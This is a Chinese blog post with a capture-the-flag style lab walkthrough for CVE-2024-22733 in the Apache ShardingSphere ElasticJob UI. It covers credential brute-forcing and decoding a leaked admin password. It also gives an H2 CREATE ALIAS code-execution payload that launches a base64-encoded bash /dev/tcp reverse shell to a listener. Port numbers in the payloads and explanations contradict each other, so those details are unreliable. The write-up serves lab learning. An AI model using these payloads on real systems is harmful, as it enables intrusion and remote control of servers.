【春秋云镜】CVE-2024-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞解题思路

最新推荐文章于 2024-08-22 15:10:37 发布

2401_84240369

最新推荐文章于 2024-08-22 15:10:37 发布

阅读量3.5k

点赞数 18

分类专栏： 2024年程序员学习文章标签： apache ui

本文链接：https://blog.csdn.net/2401_84240369/article/details/137616790

版权

2024年程序员学习专栏收录该内容

94 篇文章 0 订阅

订阅专栏

二、信息收集、判断注入点

很明显题目靶场介绍中返回token中包含管理员密码，管理员密码是拿到目标系统的关键，顺着往下走

打开界面啥也没有，没有任何提示，也没有提示登录的用户名密码，那就burpsuit爆破，不会的可以看我上一篇文章，这里边有如何使用burp爆破，当然工具不唯一【春秋云镜】CVE-2022-25578 taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码解题思路-CSDN博客

我用我自己的字典username.txt/password.txt爆破出root/root guest/guest ，当然这个靶场设置初心不是让你直接就root登录，是靶场介绍里边的内容，那我们就拿着guest/guest进行登录

从小就喜欢美女，所以没时间学习英文，英文有待提高，我整中文

都没反应，guest用户没权限增加什么东西，那怎么办，进行不下去了，哦，他说返回token中，到这页面没变化，没有法和服务器交互，那肯定就没有返回值了，唯一有交互的地方就是guest/guest登录界面有交互，抓包！

呦，看着返回token这串乱码像是base64编码，解码看看

解码发现root/root是管理员账户密码，拿着它登录

有添加权限了，尝试构造恶意数据

三、构造Payload

发现注册中心配置咱们没地址，看看时间准总数据源配置

哎，这个驱动是H2 数据库的 JDBC 驱动程序类，可以确定数据库是H2，又可以输入链接url，那我们可以尝试使用反向shell，什么是反向shell呢，给大家说一下：

反向shell：

反向 Shell 经常被用于构造恶意数据执行权限绕过攻击。在网络安全领域，反向 Shell 是一种常见的技术，它允许攻击者从远程位置控制一个受害系统。这种技术通常用于绕过防火墙或其他网络安全措施，因为它是从受害者的系统向攻击者的控制端发起连接，而不是传统的直接攻击方式（攻击者直接连接到受害者系统）。由于许多防火墙和安全系统配置为允许出站连接而阻止未经请求的入站连接，反向 Shell 可以有效绕过这些安全措施。

在权限绕过攻击中，攻击者首先需要找到一种方式将恶意代码（如反向 Shell 脚本）注入到目标系统中。这可以通过多种方式实现，包括但不限于：利用软件漏洞、钓鱼攻击、或者社会工程学技巧。一旦恶意代码被执行，它会尝试建立一个连接回攻击者指定的服务器或机器上的监听端口。

这种攻击方式的危险之处在于，它允许攻击者远程执行命令，获取敏感信息，甚至可能升级权限来获取对整个系统的控制。这就是为什么反向 Shell 是黑帽黑客和网络攻击者常用的工具之一。

启用NC监听端口，由于我这边在本机nc监听端口和web端口需要不一样，一个9998一个9999

本地启用web网站，用啥都行，我这边是http://127.0.0.1:9999，本地NC监听9998端口**（地址端口不唯一，我这边靶场是公网环境，所以内网机器要开通映射放出去，需根据具体情况更改）**，在网站根目录下构造恶意SQL代码，保存后缀为.sql的文件：

CREATE ALIAS EXEC AS ‘String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return “123”;}’;CALL EXEC (‘bash -c {echo,xxxxxxxxxxxxxxxxxxx}|{base64,-d}|{bash,-i}’)
注意：xxxxxxxxxxxxxxxxxxx要换成“bash -i >& /dev/tcp/127.0.0.1/9998 0>&1”的base编码，随便你找个工具encode下，127.0.0.1/9998是我的nc监听回显端口

①CREATE ALIAS EXEC AS ‘String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return “123”;}’;CALL EXEC (‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}’)

这段 SQL 代码是针对 H2 数据库的，并且它试图在数据库中执行 Java 代码以创建一个外部进程。具体分析如下：

CREATE ALIAS EXEC AS ...：这条语句创建了一个名为 EXEC 的别名，其背后的 Java 方法允许执行外部命令。这个 Java 方法定义了一个名为 shellexec 的函数，该函数接受一个字符串参数 cmd（代表要执行的命令），使用 Runtime.getRuntime().exec(cmd); 执行该命令，然后返回字符串 “123”。这种方式可以让 SQL 调用操作系统级的命令，增加了安全风险。
CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OCAwPiYx}|{base64,-d}|{bash,-i}')：这是一个调用 EXEC 函数的 SQL 命令，执行一个复合的 bash 命令。这个命令做了以下几步：

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OCAwPiYx：这部分使用 echo 输出一个 Base64 编码的字符串。
base64 -d：这部分将上一步的输出解码。解码的内容是一个 bash 命令：bash -i >& /dev/tcp/127.0.0.1/9998 0>&1，这条命令尝试创建一个反向 shell，连接到本地机器的 9998 端口**（这就是前边我NC监听用的是9998需要同步起来，反弹shell是要在你监听的端口回显的）**。
bash -i：这部分指示 bash 以交互模式执行解码后的命令。

整体而言，这段代码的目的是通过 H2 数据库执行一个反向 shell，尝试与本地机器的 9999 端口建立连接，并允许执行进一步的命令。这是一种安全攻击技术，用于在已经受到攻击的系统中深入执行恶意操作。

②bash -i >& /dev/tcp/127.0.0.1/9998 0>&1

这行命令是在使用 Bash shell 创建一个反向 shell，向目标主机和端口建立 TCP 连接，并且将 Bash shell 的输入输出重定向到这个连接中。具体来说，这行命令的各个部分意味着：

bash -i：启动 Bash 并使其运行在交互模式下，这样可以执行命令并接收输入。
>&：这是重定向操作符，用于将标准输出（STDOUT）重定向到其他位置。
/dev/tcp/127.0.0.1/9998：这是一个特殊的文件路径，利用 Bash 的内置功能来创建 TCP 连接。这里的 127.0.0.1 是本地回环地址，表示本机，9999 是目标端口号。
0>&1：将标准输入（STDIN）重定向到标准输出（STDOUT）。这意味着来自 TCP 连接的输入（例如远程命令）将被 Bash 进程读取并执行。

简单来说，这行命令的作用是在本机（127.0.0.1）的9999端口上创建一个反向 shell，允许通过这个端口远程执行 Bash 命令。这通常用于网络渗透测试或者当系统已经被侵入时，攻击者希望保持对系统的控制。